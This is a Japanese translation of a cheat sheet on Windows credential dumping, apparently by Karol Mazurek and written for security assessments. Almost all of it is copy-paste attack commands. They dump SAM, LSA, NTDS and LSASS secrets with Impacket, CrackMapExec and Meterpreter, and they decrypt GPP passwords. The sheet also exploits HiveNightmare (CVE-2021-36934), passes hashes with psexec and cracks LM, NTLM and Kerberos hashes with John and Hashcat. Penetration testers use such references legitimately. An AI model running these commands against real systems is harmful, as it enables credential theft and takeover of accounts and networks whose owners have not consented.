Windowsのクレデンシャルダンプ / Windows — Credentials Dumping | by Karol Mazurek

Windowsの認証情報をダンプするための最新のツールやテクニックを紹介するチートシートです。

初めに

この記事では、Windowsのクレデンシャルダンプのための現在のツール＆テクニックを紹介します。非常に短く、チートシートスタイルで書かれています。主な目的は、コマンドを1つの場所に集約し、評価中にコピー＆ペーストできるようにすることです。この短い記事のボーナスとして、最後にはJohn The RipperとHashcatを使ってWindowsのハッシュをクラックするためのコマンドを見つけることができます。

ツール

1. LaZagne
2. Impacket
3. CrackMapExec
4. HiveNightmare (CVE-2021–36934)
5. Meterpreter — credential_collector
6. Meterpreter — smart_hashdump

コマンド

• よく使うソフトのパスワード検索:

laZagne.exe all

• 特定のファイルタイプに含まれるテキスト「パスワード」の手動検索:

findstr /si 'password' *.txt *.xml *.docx

• ターゲット上でエージェントを実行せずにリモートでハッシュダンプ:

impacket-secretsdump $domain/$user:$pass@$ip

• CMEを用いた様々なハッシュダンプ:
  (ユーザがローカルアカウントの場合、-local-auth オプションを使用します。)

crackmapexec smb $ip -u $user -p $pass --sam

crackmapexec smb $ip -u $user -p $pass --lsa

crackmapexec smb $ip -u $user -p $pass --ntds

crackmapexec smb $ip -u $user -p $pass --ntds vss

crackmapexec smb $ip -u $user -p $pass -M lsassy

crackmapexec smb $ip -u $user -p $pass -M wireless

crackmapexec smb $ip -u $user -p $pass -M handlekatz

crackmapexec smb $ip -u $user -p $pass -M nanodump

crackmapexec smb $ip -u $user -p $pass -M procdump

crackmapexec smb $ip -u $user -p $pass --laps

crackmapexec smb $ip -u $user -p $pass -M gpp_password

デフォルトの管理者名がadministratorでない場合は、オプションの後にユーザー名を追加します: --laps <name>.

• GPPの復号化:

gpp-decrypt $encrypted_password

• Meterpreterモジュール:
  (まず、lsass.exeプロセスに移行するのがよいでしょう)

migrate <id of lsass.exe>

run post/windows/gather/credentials/credential_collector

run post/windows/gather/smart_hashdump

CVE-2021-36934 (別名SeriousSam)

非管理者として任意のレジストリハイブを読み取ることができるようにするエクスプロイトです。

• SAM、SECURITY、SYSTEMのハイブダンプの取得:

.\HiveNightmare.exe

• これら3つのファイルをダウンロードし、ハッシュをダンプします。:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

• PSHtechniqueを使用してリモートシステムにログインします。:

impacket-psexec -hashes $hash $user@$ip

クラッキング

• LM

john --format=lm hash.txt

hashcat -m 3000 -a 3 hash.txt

• NTML

john --format=nt hash.txt

hashcat -m 1000 -a 3 hash.txt

• NTLMv1

john --format=netntlm hash.txt

hashcat -m 5500 -a 3 hash.txt

• NTLMv2

john --format=netntlmv2 hash.txt

hashcat -m 5600 -a 0 hash.txt

• Kerberos 5 TGS

john --format=krb5tgs hash.txt --wordlist=rockyou.txt

hashcat -m 13100 -a 0 hash.txt rockyou.txt

• Kerberos ASREP

john --format=krb5asrep hash.txt --wordlist=rockyou.txt

hashcat -m18200 hash.txt rockyou.txt

出典：Windows — Credentials Dumping | by Karol Mazurek